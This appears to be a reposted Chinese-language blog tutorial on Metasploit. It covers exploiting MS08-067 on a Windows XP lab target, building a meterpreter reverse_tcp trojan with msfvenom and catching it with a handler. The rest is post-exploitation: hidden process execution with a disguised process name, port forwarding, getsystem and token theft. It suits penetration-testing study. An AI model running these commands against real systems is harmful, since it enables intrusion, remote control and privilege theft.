⭐【msf】 msfconsole meterpreter
对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程
对于msfconsole, Kali Linux 自带。只需用命令行启动便可。
⭐msfconsole 启动不了/初次使用
service postgresql start # 启动数据库服务
msfdb init # 初始化数据库
msfconsole # 启动metasploit
【注】msfconsole 不会就用 msfconsole -h
msf5 > help
查看帮助
⭐ms08-067漏洞攻击实践
用 ifconfig
命令 可 查看kail 系统ip ipconfig
查看 Windows ip
kali: 192.168.xxx.xxx (攻击靶机)
windows xp xxx : 192.168.xxx.xxx (被攻击靶机)
msfconsole – 进入
msfconsole
红框中 标记的是:Metasploit所有的利用模块、payload、post模块等等模块
search – 查看漏洞
search ms08_067
use – 使用漏洞
use exploit/windows/smb/ms08_067_netapi
show – 查看可以攻击的靶机操作系统型号(targets)
show targets
set – 设置target 参数
xx是对应被攻击靶机的型号
set target xx
set – 设置rhost参数
此ip为被攻击靶机的ip地址
set rhost 192.168.xxx.xxx
show – 查看参数
show options
exploit – 进行攻击
exploit
session 查看目前服务器端会话
sessions -i
启动x会话 。
sessions -i x
之后用 meterpreter
命令,转 shell
命令
shell
back – 实现返回
back
查看 payload
show payloads
⭐利用msfvenom生成木马攻击靶场
【参考链接】: i春秋 Meterpreter综合提权
msfvenom 生成 .exe
文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
windows/meterpreter/reverse_tcp : payload
lhost :木马反弹到的监听端地址=192.168.xxx.xxx
lport :监听端口=yyyy
常见 msfvenom
命令参数如下:
-p 选择一个载荷(payload)
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
用msfconsole监听
选用 exploit/multi/handler
监听模块
use exploit/multi/handler
设置payload:
set payload windows/x64/meterpreter/reverse_tcp
设置 监听ip地址以及监听端口:
set lhost 192.168.xxx.xxx
set lport yyyy
查看设置参数:
show options
开启配置模块进行监听
exploit
⭐Meterpreter
常见命令
upload – 上传文件
上传1.txt到目标靶机c:\muma\下
upload 1.txt c:\\muma\\
download – 下载目标靶机相对应权限的任意路径下的文件
命令 download file path
download c:\\muma\\1.txt
sysinfo
命令:
显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。
运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe-f muma.exe -a "-o muma.txt"
-d 在目标主机执行时显示的进程名称(用以伪装)
-m 直接从内存中执行
"-o muma.txt"是muma.exe的运行参数
网络命令
portfwd
命令:
portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy
netstat -an | grep"yyyy" #查看指定端口开放情况
基础提权
getsystem
利用 ps
命令查看目标靶机当前进程
找到管理员相应PID。若PID:xxxx
steal_token xxxx
#盗取guanliyuan
getuid
#检查是否成功
shell
【侵权删】
【转载请放链接】 https://www.cnblogs.com/Jlay/p/msf.html
Original: https://www.cnblogs.com/Jlay/p/msf.html
Author: J1ay
Title: (msf使用)msfconsole-meterpreter
原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/574160/
转载文章受原作者版权保护。转载请注明原作者出处!